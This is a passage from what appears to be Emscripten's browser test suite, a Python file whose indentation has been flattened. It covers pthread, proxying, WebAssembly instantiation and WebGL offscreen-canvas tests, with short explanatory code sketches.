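#   void cleanup(void *arg) { /* runs on pop(1), pthread_exit(), or cancellation */ }
#   ...
#   pthread_cleanup_push(cleanup, arg);
#   /* critical section */
#   pthread_cleanup_pop(1); // non-zero: run the handler now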
# Tests the pthread mutex api.
@requires_threads
def test_pthread_mutex(self):
for arg in [[], ['-DSPINLOCK_TEST']]:
self.btest(test_file('pthread', 'test_pthread_mutex.cpp'), expected='50', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
@requires_threads
def test_pthread_attr_getstack(self):
self.btest(test_file('pthread', 'test_pthread_attr_getstack.cpp'), expected='0', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test that memory allocation is thread-safe.
@requires_threads
def test_pthread_malloc(self):
self.btest(test_file('pthread', 'test_pthread_malloc.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Stress test pthreads allocating memory that will call to sbrk(), and main thread has to free up the data.
@requires_threads
def test_pthread_malloc_free(self):
self.btest(test_file('pthread', 'test_pthread_malloc_free.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'INITIAL_MEMORY=256MB'])
# Test that the pthread_barrier API works ok.
@requires_threads
def test_pthread_barrier(self):
self.btest(test_file('pthread', 'test_pthread_barrier.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the pthread_once() function.
@requires_threads
def test_pthread_once(self):
self.btest(test_file('pthread', 'test_pthread_once.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
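# pthread_once() runs an init routine exactly once regardless of how many threads
# race to call it (sketch, not the actual test source):
#
#   static pthread_once_t once = PTHREAD_ONCE_INIT;
#   void init(void) { /* executed by exactly one of the callers */ }
#   ...
#   pthread_once(&once, init);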
# Test against a certain thread exit time handling bug by spawning tons of threads.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_spawns(self):
self.btest(test_file('pthread', 'test_pthread_spawns.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '--closure=1', '-s', 'ENVIRONMENT=web,worker'])
# It is common for code to flip volatile global vars for thread control. This is a bit lax, but
# nevertheless, test whether that kind of scheme works with Emscripten as well.
@requires_threads
def test_pthread_volatile(self):
for arg in [[], ['-DUSE_C_VOLATILE']]:
self.btest(test_file('pthread', 'test_pthread_volatile.cpp'), expected='1', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
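# The volatile-global scheme referred to above looks roughly like this
# (sketch, not the actual test source):
#
#   volatile int done = 0;
#   void *worker(void *arg) { /* ... */ done = 1; return NULL; }
#   ...
#   while (!done) {} // main thread spins until the worker flips the flag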
# Test thread-specific data (TLS).
@requires_threads
def test_pthread_thread_local_storage(self):
self.btest(test_file('pthread', 'test_pthread_thread_local_storage.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'ASSERTIONS'])
# Test the pthread condition variable creation and waiting.
@requires_threads
def test_pthread_condition_variable(self):
self.btest(test_file('pthread', 'test_pthread_condition_variable.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthreads are able to do printf.
@requires_threads
def test_pthread_printf(self):
def run(debug):
self.btest(test_file('pthread', 'test_pthread_printf.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'LIBRARY_DEBUG=%d' % debug])
run(debug=True)
run(debug=False)
# Test that pthreads are able to do cout. Failed due to https://bugzilla.mozilla.org/show_bug.cgi?id=1154858.
@requires_threads
def test_pthread_iostream(self):
self.btest(test_file('pthread', 'test_pthread_iostream.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
@requires_threads
def test_pthread_unistd_io_bigint(self):
self.btest_exit(test_file('unistd', 'io.c'), args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'WASM_BIGINT'])
# Test that the main thread is able to use pthread_set/getspecific.
@requires_threads
def test_pthread_setspecific_mainthread(self):
self.btest(test_file('pthread', 'test_pthread_setspecific_mainthread.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS'], also_asmjs=True)
# Test that pthreads have access to filesystem.
@requires_threads
def test_pthread_file_io(self):
self.btest(test_file('pthread', 'test_pthread_file_io.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test that the pthread_create() function operates benignly in the case that threading is not supported.
@requires_threads
def test_pthread_supported(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8']]:
self.btest(test_file('pthread', 'test_pthread_supported.cpp'), expected='0', args=['-O3'] + args)
@requires_threads
def test_pthread_dispatch_after_exit(self):
self.btest_exit(test_file('pthread', 'test_pthread_dispatch_after_exit.c'), args=['-s', 'USE_PTHREADS'])
# Test the operation of Module.pthreadMainPrefixURL variable
@no_wasm_backend('uses js')
@requires_threads
def test_pthread_custom_pthread_main_url(self):
ensure_dir('cdn')
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten/emscripten.h>
#include <emscripten/threading.h>
#include <pthread.h>
int result = 0;
void *thread_main(void *arg) {
emscripten_atomic_store_u32(&result, 1);
pthread_exit(0);
}
int main() {
pthread_t t;
if (emscripten_has_threading_support()) {
pthread_create(&t, 0, thread_main, 0);
pthread_join(t, 0);
} else {
result = 1;
}
REPORT_RESULT(result);
}
''')
# Test that it is possible to define a "Module.locateFile" function to locate where worker.js will be loaded from.
create_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-o', 'test.html'])
shutil.move('test.worker.js', os.path.join('cdn', 'test.worker.js'))
shutil.copyfile('test.html.mem', os.path.join('cdn', 'test.html.mem'))
self.run_browser('test.html', '', '/report_result?1')
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
create_file('shell2.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.worker.js") return "cdn/test.worker.js"; else return filename; }, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell2.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-o', 'test2.html'])
try_delete('test.worker.js')
self.run_browser('test2.html', '', '/report_result?1')
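# Distilled shape of the Module.locateFile hook used in both variants above
# (sketch): the runtime calls it with (path, prefix) for every asset it loads,
# and the returned string is used as the URL.
#
#   var Module = {
#     locateFile: function(path, prefix) {
#       if (path.endsWith('.worker.js')) return 'cdn/' + path;
#       return prefix + path;
#     }
#   };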
# Test that there is no deadlock when the main thread performs a futex wait while a pthread needs it to do a proxied operation (before that pthread would wake up the main thread).
@requires_threads
def test_pthread_proxying_in_futex_wait(self):
self.btest(test_file('pthread', 'test_pthread_proxying_in_futex_wait.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test that sbrk() operates properly in multithreaded conditions
@requires_threads
def test_pthread_sbrk(self):
for aborting_malloc in [0, 1]:
print('aborting malloc=' + str(aborting_malloc))
# With aborting malloc = 1, test allocating memory in threads
# With aborting malloc = 0, allocate so much memory in threads that some of the allocations fail.
self.btest(test_file('pthread', 'test_pthread_sbrk.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'ABORTING_MALLOC=' + str(aborting_malloc), '-DABORTING_MALLOC=' + str(aborting_malloc), '-s', 'INITIAL_MEMORY=128MB'])
# Test that -s ABORTING_MALLOC=0 works in both pthreads and non-pthreads builds. (sbrk fails gracefully)
@requires_threads
def test_pthread_gauge_available_memory(self):
for opts in [[], ['-O2']]:
for args in [[], ['-s', 'USE_PTHREADS']]:
self.btest(test_file('gauge_available_memory.cpp'), expected='1', args=['-s', 'ABORTING_MALLOC=0'] + args + opts)
# Test that the proxying operations of user code from pthreads to main thread work
@requires_threads
def test_pthread_run_on_main_thread(self):
self.btest(test_file('pthread', 'test_pthread_run_on_main_thread.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test how a lot of back-to-back called proxying operations behave.
@requires_threads
def test_pthread_run_on_main_thread_flood(self):
self.btest(test_file('pthread', 'test_pthread_run_on_main_thread_flood.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async(self):
self.btest(test_file('pthread', 'call_async.c'), expected='1', args=['-s', 'USE_PTHREADS'])
# Test that it is possible to synchronously call a JavaScript function on the main thread and get a return value back.
@requires_threads
def test_pthread_call_sync_on_main_thread(self):
self.btest(test_file('pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-DPROXY_TO_PTHREAD=1', '--js-library', test_file('pthread', 'call_sync_on_main_thread.js')])
self.btest(test_file('pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread', 'call_sync_on_main_thread.js')])
self.btest(test_file('pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread', 'call_sync_on_main_thread.js'), '-s', 'EXPORTED_FUNCTIONS=[_main,_malloc]'])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async_on_main_thread(self):
self.btest(test_file('pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-DPROXY_TO_PTHREAD=1', '--js-library', test_file('pthread', 'call_async_on_main_thread.js')])
self.btest(test_file('pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread', 'call_async_on_main_thread.js')])
self.btest(test_file('pthread', 'call_async_on_main_thread.c'), expected='7', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread', 'call_async_on_main_thread.js')])
# Tests that spawning a new thread does not cause a reinitialization of the global data section of the application memory area.
@requires_threads
def test_pthread_global_data_initialization(self):
mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']]
for mem_init_mode in mem_init_modes:
for args in [['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule', '--shell-file', test_file('shell_that_launches_modularize.html')], ['-O3']]:
self.btest(test_file('pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'PTHREAD_POOL_SIZE'])
@requires_threads
@requires_sync_compilation
def test_pthread_global_data_initialization_in_sync_compilation_mode(self):
mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']]
for mem_init_mode in mem_init_modes:
args = ['-s', 'WASM_ASYNC_COMPILATION=0']
self.btest(test_file('pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'PTHREAD_POOL_SIZE'])
# Test that emscripten_get_now() reports coherent wallclock times across all pthreads, instead of each pthread independently reporting wallclock times since the launch of that pthread.
@requires_threads
def test_pthread_clock_drift(self):
self.btest(test_file('pthread', 'test_pthread_clock_drift.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
def test_pthread_utf8_funcs(self):
self.btest(test_file('pthread', 'test_pthread_utf8_funcs.cpp'), expected='0', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test the emscripten_futex_wake(addr, INT_MAX); functionality to wake all waiters
@requires_threads
def test_pthread_wake_all(self):
self.btest(test_file('pthread', 'test_futex_wake_all.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'INITIAL_MEMORY=64MB', '-s', 'NO_EXIT_RUNTIME'], also_asmjs=True)
# Test that stack base and max correctly bound the stack on pthreads.
@requires_threads
def test_pthread_stack_bounds(self):
self.btest(test_file('pthread', 'test_pthread_stack_bounds.cpp'), expected='1', args=['-s', 'USE_PTHREADS'])
# Test that real `thread_local` works.
@requires_threads
def test_pthread_tls(self):
self.btest(test_file('pthread', 'test_pthread_tls.cpp'), expected='1337', args=['-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS'])
# Test that real `thread_local` works in main thread without PROXY_TO_PTHREAD.
@requires_threads
def test_pthread_tls_main(self):
self.btest(test_file('pthread', 'test_pthread_tls_main.cpp'), expected='1337', args=['-s', 'USE_PTHREADS'])
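# For reference, the `thread_local` semantics checked by the two tests above
# (sketch, not the actual test source): each thread gets its own copy of the variable.
#
#   thread_local int counter = 0;
#   void *worker(void *arg) { counter++; return NULL; } // does not affect main's counter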
@requires_threads
def test_pthread_safe_stack(self):
# Note that as the test runs with PROXY_TO_PTHREAD, we set TOTAL_STACK,
# and not DEFAULT_PTHREAD_STACK_SIZE, as the pthread for main() gets the
# same stack size as the main thread normally would.
self.btest(test_file('core', 'test_safe_stack.c'), expected='abort:stack overflow', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'STACK_OVERFLOW_CHECK=2', '-s', 'TOTAL_STACK=64KB'])
@parameterized({
'leak': ['test_pthread_lsan_leak', ['-g4']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@requires_threads
def test_pthread_lsan(self, name, args=[]):
self.btest(test_file('pthread', name + '.cpp'), expected='1', args=['-fsanitize=leak', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', test_file('pthread', name + '.js')] + args)
@parameterized({
# Reusing the LSan test files for ASan.
'leak': ['test_pthread_lsan_leak', ['-g4']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@requires_threads
def test_pthread_asan(self, name, args=[]):
self.btest(test_file('pthread', name + '.cpp'), expected='1', args=['-fsanitize=address', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', test_file('pthread', name + '.js')] + args)
@requires_threads
def test_pthread_asan_use_after_free(self):
self.btest(test_file('pthread', 'test_pthread_asan_use_after_free.cpp'), expected='1', args=['-fsanitize=address', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', test_file('pthread', 'test_pthread_asan_use_after_free.js')])
@requires_threads
def test_pthread_exit_process(self):
args = ['-s', 'USE_PTHREADS',
'-s', 'PROXY_TO_PTHREAD',
'-s', 'PTHREAD_POOL_SIZE=2',
'-s', 'EXIT_RUNTIME',
'-DEXIT_RUNTIME',
'-O0']
args += ['--pre-js', test_file('core', 'pthread', 'test_pthread_exit_runtime.pre.js')]
self.btest(test_file('core', 'pthread', 'test_pthread_exit_runtime.c'), expected='onExit status: 42', args=args)
@requires_threads
def test_pthread_no_exit_process(self):
# Same as above but without EXIT_RUNTIME. In this case we don't expect onExit to
# ever be called.
args = ['-s', 'USE_PTHREADS',
'-s', 'PROXY_TO_PTHREAD',
'-s', 'PTHREAD_POOL_SIZE=2',
'-O0']
args += ['--pre-js', test_file('core', 'pthread', 'test_pthread_exit_runtime.pre.js')]
self.btest(test_file('core', 'pthread', 'test_pthread_exit_runtime.c'), expected='43', args=args)
# Tests MAIN_THREAD_EM_ASM_INT() function call signatures.
def test_main_thread_em_asm_signatures(self):
self.btest_exit(test_file('core', 'test_em_asm_signatures.cpp'), assert_returncode=121, args=[])
@requires_threads
def test_main_thread_em_asm_signatures_pthreads(self):
self.btest_exit(test_file('core', 'test_em_asm_signatures.cpp'), assert_returncode=121, args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'ASSERTIONS'])
@requires_threads
def test_main_thread_async_em_asm(self):
self.btest_exit(test_file('core', 'test_main_thread_async_em_asm.cpp'), args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'ASSERTIONS'])
@requires_threads
def test_main_thread_em_asm_blocking(self):
create_file('page.html', open(test_file('browser', 'test_em_asm_blocking.html')).read())
self.compile_btest([test_file('browser', 'test_em_asm_blocking.cpp'), '-O2', '-o', 'wasm.js', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
self.run_browser('page.html', '', '/report_result?8')
# Test that it is possible to send a signal by calling alarm(timeout), which in turn calls the signal handler set by signal(SIGALRM, func).
def test_sigalrm(self):
self.btest(test_file('sigalrm.cpp'), expected='0', args=['-O3'])
def test_canvas_style_proxy(self):
self.btest('canvas_style_proxy.c', expected='1', args=['--proxy-to-worker', '--shell-file', test_file('canvas_style_proxy_shell.html'), '--pre-js', test_file('canvas_style_proxy_pre.js')])
def test_canvas_size_proxy(self):
self.btest(test_file('canvas_size_proxy.c'), expected='0', args=['--proxy-to-worker'])
def test_custom_messages_proxy(self):
self.btest(test_file('custom_messages_proxy.c'), expected='1', args=['--proxy-to-worker', '--shell-file', test_file('custom_messages_proxy_shell.html'), '--post-js', test_file('custom_messages_proxy_postjs.js')])
def test_vanilla_html_when_proxying(self):
for opts in [0, 1, 2]:
print(opts)
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js', '-O' + str(opts), '--proxy-to-worker'])
create_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
def test_in_flight_memfile_request(self):
# test the XHR for an asm.js mem init file being in flight already
for o in [0, 1, 2]:
print(o)
opts = ['-O' + str(o), '-s', 'WASM=0']
print('plain html')
self.compile_btest([test_file('in_flight_memfile_request.c'), '-o', 'test.js'] + opts)
create_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0') # never when we provide our own HTML like this.
print('default html')
self.btest('in_flight_memfile_request.c', expected='0' if o < 2 else '1', args=opts) # should happen when there is a mem init file (-O2+)
@requires_sync_compilation
def test_binaryen_async(self):
# notice when we use async compilation
script = '''
<script>
// note if we do async compilation
var real_wasm_instantiate = WebAssembly.instantiate;
var real_wasm_instantiateStreaming = WebAssembly.instantiateStreaming;
if (typeof real_wasm_instantiateStreaming === 'function') {
WebAssembly.instantiateStreaming = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiateStreaming(a, b);
};
} else {
WebAssembly.instantiate = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiate(a, b);
};
}
// show stderr for the viewer's fun
err = function(x) {
out('<<< ' + x + ' >>>');
console.log(x);
};
</script>
{{{ SCRIPT }}}
'''
shell_with_script('shell.html', 'shell.html', script)
common_args = ['--shell-file', 'shell.html']
for opts, returncode in [
([], 1),
(['-O1'], 1),
(['-O2'], 1),
(['-O3'], 1),
(['-s', 'WASM_ASYNC_COMPILATION'], 1), # force it on
(['-O1', '-s', 'WASM_ASYNC_COMPILATION=0'], 0), # force it off
]:
print(opts, returncode)
self.btest_exit('binaryen_async.c', assert_returncode=returncode, args=common_args + opts)
# Ensure that compilation still works and is async without instantiateStreaming available
no_streaming = ' <script> WebAssembly.instantiateStreaming = undefined;</script>'
shell_with_script('shell.html', 'shell.html', no_streaming + script)
self.btest_exit('binaryen_async.c', assert_returncode=1, args=common_args)
# Test that implementing Module.instantiateWasm() callback works.
@parameterized({
'': ([],),
'asan': (['-fsanitize=address', '-s', 'INITIAL_MEMORY=128MB'],)
})
def test_manual_wasm_instantiate(self, args=[]):
self.compile_btest([test_file('manual_wasm_instantiate.cpp'), '-o', 'manual_wasm_instantiate.js'] + args)
shutil.copyfile(test_file('manual_wasm_instantiate.html'), 'manual_wasm_instantiate.html')
self.run_browser('manual_wasm_instantiate.html', 'wasm instantiation succeeded', '/report_result?1')
def test_wasm_locate_file(self):
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
ensure_dir('cdn')
create_file('shell2.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.wasm") return "cdn/test.wasm"; else return filename; }, '))
self.compile_btest([test_file('browser_test_hello_world.c'), '--shell-file', 'shell2.html', '-o', 'test.html'])
shutil.move('test.wasm', os.path.join('cdn', 'test.wasm'))
self.run_browser('test.html', '', '/report_result?0')
def test_utf8_textdecoder(self):
self.btest_exit('benchmark_utf8.cpp', 0, args=['--embed-file', test_file('utf8_corpus.txt') + '@/utf8_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=[UTF8ToString]'])
def test_utf16_textdecoder(self):
self.btest_exit('benchmark_utf16.cpp', 0, args=['--embed-file', test_file('utf16_corpus.txt') + '@/utf16_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=[UTF16ToString,stringToUTF16,lengthBytesUTF16]'])
def test_TextDecoder(self):
self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=0'])
just_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0')
td_with_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=2'])
td_without_fallback = os.path.getsize('test.js')
self.assertLess(td_without_fallback, just_fallback)
self.assertLess(just_fallback, td_with_fallback)
def test_small_js_flags(self):
self.btest('browser_test_hello_world.c', '0', args=['-O3', '--closure=1', '-s', 'INCOMING_MODULE_JS_API=[]', '-s', 'ENVIRONMENT=web'])
# Check an absolute js code size, with some slack.
size = os.path.getsize('test.js')
print('size:', size)
# Note that this size includes test harness additions (for reporting the result, etc.).
self.assertLess(abs(size - 5453), 100)
# Tests that it is possible to initialize and render WebGL content in a pthread by using OffscreenCanvas.
# -DTEST_CHAINED_WEBGL_CONTEXT_PASSING: Tests that it is possible to transfer WebGL canvas in a chain from main thread -> thread 1 -> thread 2 and then init and render WebGL content there.
@no_chrome('see https://crbug.com/961765')
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_pthread(self):
for args in [[], ['-DTEST_CHAINED_WEBGL_CONTEXT_PASSING']]:
self.btest('gl_in_pthread.cpp', expected='1', args=args + ['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL'])
# Tests that it is possible to render WebGL content on a <canvas> on the main thread, after it has once been used to render WebGL content in a pthread first
# -DTEST_MAIN_THREAD_EXPLICIT_COMMIT: Test the same (WebGL on main thread after pthread), but by using explicit .commit() to swap on the main thread instead of implicit "swap when rAF ends" logic
@requires_threads
@requires_offscreen_canvas
@disabled('This test is disabled because current OffscreenCanvas does not allow transfering it after a rendering context has been created for it.')
def test_webgl_offscreen_canvas_in_mainthread_after_pthread(self):
for args in [[], ['-DTEST_MAIN_THREAD_EXPLICIT_COMMIT']]:
self.btest('gl_in_mainthread_after_pthread.cpp', expected='0', args=args + ['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL'])
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_only_in_pthread(self):
self.btest('gl_only_in_pthread.cpp', expected='0', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER'])
# Tests that rendering from client side memory without default-enabling extensions works.
@requires_graphics_hardware
def test_webgl_from_client_side_memory_without_default_enabled_extensions(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1', '-DDRAW_FROM_CLIENT_MEMORY=1', '-s', 'FULL_ES2=1'])
# Tests for WEBGL_multi_draw extension
# For testing WebGL draft extensions like this, if using Chrome as the browser,
# we might want to append --enable-webgl-draft-extensions to the EMTEST_BROWSER env arg.
@requires_graphics_hardware
def test_webgl_multi_draw(self):
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ARRAYS=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ARRAYS_INSTANCED=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ELEMENTS=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ELEMENTS_INSTANCED=1', '-DEXPLICIT_SWAP=1'])
# Tests for base_vertex/base_instance extension
# For testing WebGL draft extensions like this, if using Chrome as the browser,
# we might want to append --enable-webgl-draft-extensions to the EMTEST_BROWSER env arg.
# If testing on Mac, you also need --use-cmd-decoder=passthrough to get this extension.
# Also there is a known bug with Mac Intel baseInstance which can fail to produce the expected image result.
@requires_graphics_hardware
def test_webgl_draw_base_vertex_base_instance(self):
for multiDraw in [0, 1]:
for drawElements in [0, 1]:
self.btest('webgl_draw_base_vertex_base_instance_test.c', reference='webgl_draw_instanced_base_vertex_base_instance.png',
args=['-lGL',
'-s', 'MAX_WEBGL_VERSION=2',
'-s', 'OFFSCREEN_FRAMEBUFFER',
'-DMULTI_DRAW=' + str(multiDraw),
'-DDRAW_ELEMENTS=' + str(drawElements),
'-DEXPLICIT_SWAP=1',
'-DWEBGL_CONTEXT_VERSION=2'])
# Tests that -s OFFSCREEN_FRAMEBUFFER=1 rendering works.
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer(self):
# Tests all the different possible versions of libgl
for threads in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
for version in [[], ['-s', 'FULL_ES2'], ['-s', 'FULL_ES3']]:
args = ['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1'] + threads + version
print('with args: %s' % str(args))
self.btest('webgl_draw_triangle.c', '0', args=args)
# Tests that VAOs can be used even if WebGL enableExtensionsByDefault is set to 0.
@requires_graphics_hardware
def test_webgl_vao_without_automatic_extensions(self):
self.btest('test_webgl_no_auto_init_extensions.c', '0', args=['-lGL', '-s', 'GL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=0'])
# Tests that offscreen framebuffer state restoration works
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer_state_restoration(self):
for args in [
# full state restoration path on WebGL 1.0
['-s', 'MAX_WEBGL_VERSION', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH'],
# VAO path on WebGL 1.0
['-s', 'MAX_WEBGL_VERSION'],
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=0'],
# VAO path on WebGL 2.0
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-DTEST_REQUIRE_VAO=1'],
# full state restoration path on WebGL 2.0
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH'],
# blitFramebuffer path on WebGL 2.0 (falls back to VAO on Firefox < 67)
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=0'],
]:
cmd = args + ['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1']
self.btest('webgl_offscreen_framebuffer_swap_with_bad_state.c', '0', args=cmd)
# Tests that -s WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1 rendering works.
@requires_graphics_hardware
def test_webgl_workaround_webgl_uniform_upload_bug(self):
